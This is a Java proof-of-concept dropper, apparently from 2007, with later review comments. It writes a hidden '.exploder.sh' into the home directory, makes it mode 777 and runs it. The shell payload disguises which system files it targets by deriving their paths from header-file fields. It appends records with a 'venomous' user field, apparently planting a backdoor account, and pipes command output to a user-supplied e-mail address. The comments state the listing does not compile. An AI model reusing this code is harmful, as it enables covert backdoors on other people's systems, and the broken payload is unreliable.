/*
 Exploder Copyright (c) 2007 Jesus Oquendo sil @ infiltrated .....

 Proof of concept code to insert a backdoor into most Linux based systems...
 Originally written as a shell script, work in progress to port over to JAVA
 under the premise of attempting to run it while under the exploder attack
 posted at: http://www.securityfocus.com/archive/1/466017/30/30/threaded

 The concept would be as follows:

 Evilscript1 Evilscript2 exploderscript

 Evilscript1 could be this script...

 Evilscript2 could work in conjunction with say mod_security or mod_rewrite
 which would/could parse out the visitors IP address and re-write a sanitized
 page should that visitor go back to try to view the source code

 After Evilscript1 and Evilscript2 are run on a machine this script could be
 used to throw the machine into an obliviated state forcing the user to kill
 their browser...

 Java ripped from Homer.java ... awk+sed based off my venomous Proof of Concept
 http://www.infiltrated.net/scripts/venomous
*/

import java.io.*;

/**
 * Dropper stage of the proof of concept described in the file header: it writes
 * a shell script into the current user's home directory, changes its mode, and
 * runs it with /bin/sh.
 *
 * NOTE(review): the listing does not compile as printed (the payload string is
 * malformed). It is documented here as-is and deliberately not repaired.
 *
 * Observable artifacts, all taken from the literals below:
 *   - a hidden file named ".exploder.sh" directly under the user's home directory;
 *   - that file being set to mode 777;
 *   - a Java process spawning /usr/bin/chmod and then /bin/sh on that file;
 *   - awk/sed reading /usr/include/paths.h, /usr/include/sysexits.h and
 *     /usr/include/linux/wireless.h, followed by appends (">>") to the files
 *     those reads resolve to;
 *   - appended records whose first colon-separated field is "venomous".
 */
class Exploder {
    /**
     * Builds the script text, writes it to disk and launches it.
     *
     * @param argv command-line arguments; not read anywhere in this method
     */
    public static void main (String[] argv) {
        try {
            // Resolved from the JVM's "user.home" property, so the drop location
            // follows whichever account runs the code.
            String userHome = System.getProperty("user.home");
            // Assigned but never read in this listing.
            String target = "$HOME";
            // Opens (creating or truncating) <user.home>/.exploder.sh; the leading
            // dot hides it from a plain directory listing.
            FileOutputStream outer = new FileOutputStream(userHome + "/.exploder.sh");
            // Shell payload. It does not name the files it modifies: "happy" and
            // "days" are filled at run time from one field of a fixed line number
            // in a system header, so a search for sensitive paths in this source
            // or in the dropped script finds nothing. Which paths result depends
            // on the header versions installed and cannot be determined from this
            // listing; given the stated backdoor goal they are presumably account
            // database files -- TODO confirm against the headers of the system
            // under investigation.
            // The two ">>" commands append a copy of each target's first record
            // with field 1 replaced by "venomous"; the awk variant also blanks
            // field 2. The remaining commands assemble a command ("who", "what")
            // from header text the same way, prompt for an e-mail address, and
            // pipe the output of one into the other with that address as argument.
            String exploder = "happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`" +
                "days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`" +
                "sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $happy" +
                "sed -n '1p' $days|sed 's/[^:]*:/venomous:/' >> $days" +
                "what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`" +
                "who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`" +
                "echo "Enter your email address" ; read ans ; where=$ans"" +
                "$who | $what $where" +
            byte[] buffer = new byte[exploder.length()];
            // Deprecated String.getBytes(int, int, byte[], int): copies only the
            // low-order byte of each char into the buffer.
            exploder.getBytes(0, exploder.length(), buffer, 0);
            outer.write(buffer);
            outer.close();
            // Mode 777 makes the dropped script readable, writable and executable
            // by every local account. The returned Process handle is not used.
            Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " + userHome + "/.exploder.sh");
            // Runs the script through /bin/sh as a child of the JVM; the handle is
            // likewise unused, so the program does not read the script's output.
            Process
            exec = Runtime.getRuntime().exec("/bin/sh " + userHome + "/.exploder.sh");
        // Every IOException from the write or the two exec calls is discarded, so
        // a failure produces no message or stack trace.
        } catch (IOException ioe) {}
    }
}